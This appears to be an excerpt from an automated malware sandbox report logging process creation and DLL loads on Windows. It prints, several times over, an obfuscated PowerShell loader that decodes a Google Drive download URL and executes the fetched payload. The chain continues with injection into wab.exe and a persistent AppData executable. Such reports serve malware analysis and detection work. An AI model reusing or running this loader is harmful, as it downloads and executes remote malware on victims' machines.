riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msftedit.dll	Jump to behavior
